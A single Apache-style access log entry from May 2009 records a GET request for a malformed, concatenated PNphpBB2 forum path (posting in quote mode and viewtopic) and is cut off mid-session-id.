121.173.130.41 - - [16/May/2009:03:49:48 -0400] "GET /logs/access_log.Q108122400%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746